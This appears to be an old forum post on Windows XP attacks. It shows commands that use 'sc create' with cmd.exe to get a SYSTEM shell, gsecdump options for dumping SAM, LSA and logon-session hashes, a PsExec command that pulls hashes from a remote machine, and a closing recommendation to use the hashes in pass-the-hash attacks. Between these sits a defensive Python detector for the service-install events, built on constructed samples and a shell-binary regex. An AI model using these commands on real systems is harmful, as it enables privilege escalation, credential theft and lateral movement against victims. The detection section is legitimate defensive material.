To get a DOS prompt as NT SYSTEM:
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------
Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]
options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
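As an added defender's example (not part of the original post or of gsecdump/PsExec), the sequence above leaves a recognisable trail in the System log: a 7045 service install whose image is cmd.exe, followed within seconds by the 1053 timeout (events 7009/7000) because cmd.exe never connects to the service control dispatcher, and a PSEXESVC install when PsExec is used. The records below are constructed samples, and the field names are a flattened form of the real 7045 fields.

```python
import re
from datetime import datetime

# Constructed sample records (not real logs): Service Control Manager events from the
# System log, flattened to dicts. 7045 = "A service was installed in the system",
# 7009 = timeout waiting for the service to connect, 7000 = "service failed to start"
# (this is where the 1053 message from the transcript above ends up).
SAMPLE_EVENTS = [
    {"time": "2007-03-16T10:00:01", "id": 7045, "name": "shellcmdline",
     "image": r"C:\WINDOWS\system32\cmd.exe /K start", "account": "LocalSystem"},
    {"time": "2007-03-16T10:00:02", "id": 7009, "name": "shellcmdline"},
    {"time": "2007-03-16T10:00:32", "id": 7000, "name": "shellcmdline"},
    {"time": "2007-03-16T10:05:00", "id": 7045, "name": "PSEXESVC",
     "image": r"C:\WINDOWS\PSEXESVC.exe", "account": "LocalSystem"},
    {"time": "2007-03-16T11:00:00", "id": 7045, "name": "AVUpdater",
     "image": r"C:\Program Files\AV\updater.exe", "account": "LocalSystem"},
]

# Binaries that are interpreters or shells rather than real service executables.
SHELL_RE = re.compile(r"\\(cmd|powershell|pwsh|wscript|cscript|rundll32)\.exe\b", re.I)

def suspicious_service_installs(events, window_s=60):
    """Return [(service name, [reasons])] for 7045 installs that look like the trick
    above: image is a shell/interpreter, the service is PsExec's PSEXESVC, or the
    install is followed within window_s seconds by a start timeout (7009/7000)."""
    installs = [e for e in events if e["id"] == 7045]
    failures = [e for e in events if e["id"] in (7009, 7000)]
    findings = []
    for inst in installs:
        reasons = []
        if SHELL_RE.search(inst["image"]):
            reasons.append("image is a shell/interpreter")
        if inst["name"].upper() == "PSEXESVC":
            reasons.append("PsExec remote-execution service")
        t0 = datetime.fromisoformat(inst["time"])
        for f in failures:
            delta = (datetime.fromisoformat(f["time"]) - t0).total_seconds()
            if f["name"] == inst["name"] and 0 <= delta <= window_s:
                reasons.append(f"start failure {f['id']} within {window_s} s of install")
                break
        if reasons:
            findings.append((inst["name"], reasons))
    return findings

if __name__ == "__main__":
    for name, reasons in suspicious_service_installs(SAMPLE_EVENTS):
        print(f"{name}: {'; '.join(reasons)}")
```

On Windows Vista and later, session 0 isolation keeps a service's window off the interactive desktop, so this XP-era trick no longer yields a usable console there, but the 7045 and 7009/7000 events are still the thing to alert on.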

A tip: you can use iam from the pshtools toolkit to inject the hashes just grabbed with gsecdump into the local lsass process and carry out a hash-injection attack. The foreigners really are good at this; admins are going to be busy now. The LM/NT hashes captured during ARP spoofing, and the ones obtained with gethash, actually never need to be cracked at all; it is just a matter of using the tool. As the original article puts it well, whether the password is 4 characters or 127, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx
I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.